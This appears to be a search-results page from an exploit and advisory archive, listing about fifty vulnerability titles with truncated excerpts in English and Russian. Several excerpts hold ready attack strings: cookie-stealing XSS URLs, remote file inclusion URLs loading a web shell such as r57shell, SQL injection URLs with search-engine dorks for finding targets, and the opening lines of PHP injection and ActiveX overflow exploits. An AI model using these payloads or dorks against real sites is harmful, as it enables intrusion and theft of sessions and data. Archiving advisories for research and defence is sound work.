47153 matches found
Vulnerability in coWiki
Здравствуйте 3APA3A! Сообщаю вам о найденной мною Cross-Site Scripting уязвимости в coWiki. XSS: Уязвимость в главном скрипте в параметре q. http://site/?cmd=srchdoc&q=223E3Cscript3Ealertdocument.cookie3C/script3E Дополнительная информация о данной уязвимости у меня на сайте:...
Ahhp(php)-Portal Remote File Inclusion
Ahhp-Portal Remote File Inclusion SЭTE:www.ahhope.org Demo:http://xinan.ahtcm.edu.cn Demo2http://www.hfspaq.gov.cn Vul Code: ? if $sc=='' include$fp.".php"; else include$sc."/".$fp.".php"; ? ------------------------------------------------ example: http://site/page.php?fp=r57shell?...
Step-by-step instructions for debugging Cisco IOS using gdb
Step-by-step instructions for debugging IOS using gdb - Andy Davis, 2008 iosftpexploit "at" googlemail dot com: I have been asked by many people for a simple step-by-step guide for setting up an IOS exploit development environment, which includes connecting to a Cisco router using gdb, so here...
PulseAudio local race condition privilege escalation vulnerability
------------------------------------------------------------------------ PulseAudio local race condition privilege escalation vulnerability ------------------------------------------------------------------------ Yorick Koster, June 2009...
glFusion <= 1.1.2 COM_applyFilter()/cookies remote blind sql injection exploit
?php / glFusion = 1.1.2 COMapplyFilter/cookies remote blind sql injection exploit by Nine:Situations:Group::bookoo our site: http://retrogod.altervista.org/ software site: http://www.glfusion.org/ google dork: "Page created in" "seconds by glFusion" +RSS Found another vector of injection in...
уязвимости во многих популярных движках из за некоректной работы файловых функций языка PHP
уязвимость например имеет место быть в таких популярных форумах как phpBB и punBB, удачная эксплуатация происходит при подмене пути загрузки аватары, и загрузки аватары с PHP кодом например в EXIF заголовке. КОД: copy'1.jpg', "./dirforupload/1.php0"."/2.jpg"; или copy'1.jpg',...
SEC Consult SA-20111230-0 :: Critical authentication bypass in Microsoft ASP.NET Forms - CVE-2011-3416
SEC Consult Vulnerability Lab Security Advisory 20111230-0 ======================================================================= title: Microsoft ASP.NET Forms Authentication Bypass product: Microsoft .NET Framework vulnerable version: Microsoft .NET Framework Version:4.0.30319; ASP.NET...
PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini independent)
-------------------------------------------------------------------------------- PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation php.ini independent by Nine:Situations:Group::bookoo -------------------------------------------------------------------------------- our site:...
Hacking AJAX DWR Applications
By Guy Karlebach & Amichai Shulman Introduction The introduction of AJAX into a web application improves the user experience significantly. However, the complexity of some AJAX frameworks and the limited field experience with them requires a careful examination of potential vulnerabilities. DWR i...
многочисленные уязвимости в WoltLab Burning Book <=1.1.2
сайт прозводителя: woltlab.de уязвима версия 1.1.2 и возможно более раннии уязвимость носит критический характер файл addentry.php движка содержит код: whilelist$key,$val=each$POST $$key=$val; данные переданные методом POST не проверяются, в результате чего имеется возможность подменить глобальны...
PHP XSS exploit in phpinfo()
PHP XSS exploit in phpinfo by Silent Needle A: BACKGROUNDfrom php.net int phpinfo int what Outputs a large amount of information about the current state of PHP. This includes information about PHP compilation options and extensions, the PHP version, server information and environment if compiled ...
Simple Machines Forum "SMF Shoutbox" Mod Persistent XSS
Simple Machines Forum "SMF Shoutbox" Mod 1.16b-1.14 Reference: http://custom.simplemachines.org/mods/index.php?mod=412 Bug:Persistent XSS SMF Shoutbox is a popular shoutbox mod for Simple Machines Forum.The content of a post variable used to hold the user shout is stored in the database and then...
En: ubb hole
----- Original Message ----- From: tdf To: [email protected] Sent: Monday, November 20, 2000 2:46 PM Subject: ubb hole ----------------------------------------------------------------------------------- Ultimate Bulletin Board - Private forums security hole, by tdf [email protected]...
contentserv 4.x
ContentServ again still features remote reading of arbitrary files ==================================================================== ContentServ is a cms and "cross media publishing" software. Let me quote from their website: "At ContentServ, there is always something happening. We continously...
CORE-2008-0123: Leopard Server Remote Path Traversal
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Leopard Server Remote Path Traversal Advisory Information Title: Leopard Server Remote Path Traversal Advisory ID: CORE-2008-0123 Advisory URL:...
ECI router login bypass
Title: ECI router verification bypass and DoS Date: 24/07/2005 Impact: Log in verification bypass Vendors Status: Not contacted they were mean to me Overview: The B-FOCuS Router 312+ provides users with a reliable and secured ADSL2+ connection to the Internet. The 312+ has a single Ethernet port...
Multiple Remote Vulnerabilities in KISGB
Advisory 15 Title: Multiple Remote Vulnerabilities in KISGB Author: 0ozeuso0 Arturo Z. Contact: [email protected] Website: www.diosdelared.com Date: 22/12/06 Risk: critical Vendor Url: http://sourceforge.net/projects/kisgb, http://ravenphpscripts.com Affected Software: Keep It Simple Guest Boo...
TORNADO Computer Trading CMS - SQL Injection Vulnerability
Document Title: =============== TORNADO Computer Trading CMS - SQL Injection Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1489 Release Date: ============= 2015-05-05 Vulnerability Laboratory ID VL-ID: ====================================...
CERN Proxy Server: Cross-Site Scripting Vulnerability
CERN Proxy Server: Cross-Site Scripting Vulnerability ===================================================== Affected: CERN HTTPD 3.0A http://www.w3.org/Daemon/Activity.html Vendor Status: CERN httpd team [email protected] was notified on Aug 10, 2001 but they did not respond. Exploit:...
iAuto Mobile Application 2012 - Multiple Web Vulnerabilities
Title: ====== iAuto Mobile Application 2012 - Multiple Web Vulnerabilities Date: ===== 2012-07-11 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=658 VL-ID: ===== 658 Common Vulnerability Scoring System: ==================================== 3.5 Introduction: ===========...
CS-Forum 0.82 (ajouter.php) Remote File Include Vulnerability
CS-Forum 0.82 ajouter.php Remote File Include Vulnerability Source Code: http://www.comscripts.com/jump.php?action=script&id=643 Vulnerable Code: include"$include/footer.php"; Exploit : http://www.vicTim.com/CS-Forum/ajouter.php?include=shell.txt? Discoverd By : Mahmoodali Conatact : mahk2000 at...
mysqldumper1.24.4_LFI_XSS_CSRF_PHPEXEC_TRAVERSAL_INFO_DISCLOS
================================================================================================ Vulnerable Software: MySQLDumper Version 1.24.4 Downloaded from: http://sourceforge.net/projects/mysqldumper/files/ MD5 SUM: b62357a0d5bbb43779d16427c30966a1 MySQLDumper1.24.4.zip...
POC & exploit for Apache mod_rewrite off-by-one
Public release date of POC/Exploit: 2006-08-20 Author: Jacobo Avariento Gimeno CVE id: CVE-2006-3747 Bugtraq id: 19204 CERT advisory: VU395412 Severity: high Introduction ---- On July 28 2006 Mark Dowd McAfee Avert Labs reported a vulnerability found in modrewrite apache module to the bugtraq...
ASP Discussion Forum Like the one on FreeVBCode.com Remote XSS Exploit
----------------------------------------------------------------------------- - ASP Discussion Forum Like the one on FreeVBCode.com Remote XSS Exploit - -= http://colander.altervista.org/advisory/ASPDisc.txt =- ----------------------------------------------------------------------------- -= ASP...
[Full-disclosure] deV!L`z Clanportal - Arbitrary File Upload [061124b]
/ -061124b- | deV!Lz Clanportal - Arbitrary File Upload | / S Y N O P S I S / =================' - access: remote severity: high - deV!Lz Clanportal allows nearly arbitrary files to be uploaded and stored on the server's filesystem, which enables anyone, even without a user account, to upload PHP...
Encaps PHP/Flash Gallery 2.3.22s Database Puffing Up Exploit
Hi guys, ref: http://www.milw00rm.com/exploits/5179 !/usr/bin/perl -w Title : Encaps PHP/Flash Gallery 2.3.22s Database Puffing Up Exploit Vendor : http://www.encaps.net Download : http://sourceforge.net/projects/encapsnet/files/ Author : ZoRLu / [email protected] Website : milw00rm.com /...
glFusion <= 1.1.2 COM_applyFilter()/order sql injection exploit
?php / glFusion = 1.1.2 COMapplyFilter/order sql injection exploit by Nine:Situations:Group::bookoo working against Mysql = 4.1 php.ini independent our site: http://retrogod.altervista.org/ software site: http://www.glfusion.org/ google dork: "Page created in" "seconds by glFusion" +RSS...
abarcar Realty Portal SQL Injection Vulnerability
abarcar Realty Portal SQL Injection Vulnerability SpC-x Credit : SpC-X Site : http://www.Cyber-security.org Code : http://www.target.com/path/content.php?cat=SQL Example : http://www.abarcar.com/content.php?cat=SQL /SpC-x -- Get your free email from http://mymail.bsdmail.com...
Sana Net (viewnews.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability Sana Net viewnews.php?id AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.sana-net.com/ Persian Gulf 4 Ever! Dork : "inurl:viewnews.php?id=" " " Exploite:...
tikiwiki 1.9.5 mysql password disclosure & xss
/==========================================/ //tikiwiki version 1.9.5 CVS -Sirius- PoC // Product: Tikiwiki // URL: http://tikiwiki.org/ // RISK: critical /==========================================/ there's a critical security bug in tikiwiki version 1.9.5 CVS -Sirius- a anonymous user , can dum...
vBTube v1.1 - Beta ( Vbulletin Tube) Xss Vulnerable
-------------------------------------------------------------------------------------- title : vBTube v1.1 - Beta Vbulletin Tube Xss Vulnerable Author : CrackersChild [email protected] Exploit : vBTube.php?do=search&search=scriptalertdocument.cookie/script Dork : inurl:vBTube.php...
iOS applications multiple seucrity vulnereabilities
Multiple application with remote data access are vulnerable...
Squirrelmail local file inclusion
Squirrelmail local file inclusion bug in functions/plugin.php . Tested on the latest 1.4.x version. No authentication needed. if isset$plugins && isarray$plugins foreach $plugins as $name useplugin$name; ... function useplugin $name if fileexistsSMPATH . "plugins/$name/setup.php" includeonceSMPAT...
[SA17409] Serv-U FTP Server Potential Denial of Service Vulnerability
TITLE: Serv-U FTP Server Potential Denial of Service Vulnerability SECUNIA ADVISORY ID: SA17409 VERIFY ADVISORY: http://secunia.com/advisories/17409/ CRITICAL: Moderately critical IMPACT: DoS WHERE: From remote SOFTWARE: Serv-U FTP Server 6.x http://secunia.com/product/5878/ DESCRIPTION: A...
Web India Solutions CMS 2015 - SQL Injection Vulnerability
Document Title: =============== Web India Solutions CMS 2015 - SQL Injection Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1495 Release Date: ============= 2015-05-13 Vulnerability Laboratory ID VL-ID: ====================================...
Advisories: CSS in PHP Photo Album by John Beatty ver. 1.0
+-----------------------------+ Advisories: CSS in PHP Photo Album by John Beatty ver. 1.0 Author: nimber [email protected] Date: 4.11.2003 +-----------------------------+ Vendor: John Beatty Version: 1.0 and older versions? +-----------------------------+ Problem: There is a danger of performance...
SIPS v0.2.2 Remote File Inclusion Vulnerability
/=============================================================================================================================================== | | o SIPS v0.2.2 Remote File Inclusion Vulnerability | | Software : SIPS v0.2.2 | Vendor : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip |...
OpenSSH privilege escalation
Invalid usage of X11 cookies...
CA BrightStor ARCserve Backup r11.5 AddColumn() 0day ActiveX Remote Buffer Overflow Exploit
HTML !-- CA BrightStor ARCserve Backup r11.5 AddColumn 0day ActiveX Remote Buffer Overflow Exploit Bug discovered by Krystian Kloskowski h07 [email protected] Tested on: - CA BrightStor ARCserve Backup r11.5 ftp://ftp.ca.com/priv/trial/BABr11/BABLDr115/BABLDr115.zip - IE 6 - XP SP2 Polish Details:...
Local Root exploit (Fedora Core 4)
Local Root Exploit under Fedora Core 4 stable Advisory Florian Strankowski [email protected] www.bildunxxluecke.de/usr/florian/advisory/advisory-05-048.txt Vulnerable System : This vulnerability affects Fedora Core 4.0 stable with the kernelversion 2.6.11-1.1369FC4 1 Thu Jun 2 22:53:35...
JavaMail SMTP Header Injection via method setSubject [CSNC-2014-001]
COMPASS SECURITY ADVISORY http://www.csnc.ch/en/downloads/advisories.html Product: JavaMail Vendor: Oracle CSNC ID: CSNC-2014-001 CVD ID: none Subject: SMTP Header Injection via method setSubject Risk: Medium Effect: Remotely exploitable Author: Alexandre Herzog [email protected] Date:...
Novell ZENWorks for Desktops Version 6.5 Remote (Heap-Based) PoC
tested on IE 6 and IE 7 IE 8 Beta1 is up to urself :P worked well but no shell ! cuz its just a PoC stupid u may do some research and put the shell in the hell, anyway, have fun ------------------------------------ [email protected] ------------------------------------ html head titleNovell...
IE7
!-- securitylab.ir [email protected] -- !DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" HTML xmlns="http://www.w3.org/1999/xhtml" HEAD script function load var e; e=document.getElementsByTagName"STYLE"0; e.outerHTML="1";...
Web Design Sydney (news-item.php?id) (news-item.php?newsid) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability Web Design Sydney news-item.php?id news-item.php?newsid AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.milkdigital.com.au/ Persian Gulf 4 Ever! Dork : "web design sydney...
ArticleBeach Script <= 2.0 Remote File Inclusion Vulnerability
------------------------------------------------------------------------------ ArticleBeach Script = 2.0 page Remote File Inclusion Vulnerability ------------------------------------------------------------------------------ Author : Zeni Susanto a.k.a Bithedz Date Found : October, 22th 2006...
Удаленный отказ в обслуживании сетевого оборудования Compex
Удаленный отказ в обслуживании сетевого оборудования Compex Класс уязвимости: Удаленный DOS Описание: Удаленный пользователь может вызвать отказ в обслуживании сетевого оборудования Compex с установленным и активированным агентом UConfig активирован по-умолчанию. Уязвимость присутствует в дизайне...
ToutVirtual VirtualIQ Multiple Vulnerabilities
Secure Network - Security Research Advisory Vuln name: ToutVirtual VirtualIQ Pro Multiple Vulnerabilities Systems affected: ToutVirtual VirtualIQ Professional 3.2 build 7882 Systems not affected: -- Severity: High Local/Remote: Remote Vendor URL: http://www.toutvirtual.com Authors: Alberto Triver...
SEC Consult SA-20130311-0 :: Persistent cross-site scripting in jforum
SEC Consult Vulnerability Lab Security Advisory 20130311-0 ======================================================================= title: Persistent cross-site scripting vulnerability product: jforum vulnerable version: 2.1.9 fixed version: - impact: medium homepage: http://jforum.net/ found:...
CORE-2009-01515 - WordPress Privileges Unchecked in admin.php and Multiple Information
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ WordPress Privileges Unchecked in admin.php and Multiple Information Disclosures 1. Advisory Information Title: WordPress Privileges Unchecked in admin.php and Multip...
ChinaGames (CGAgent.dll) ActiveX Remote Code Execution Exploit
function test var shellcode =...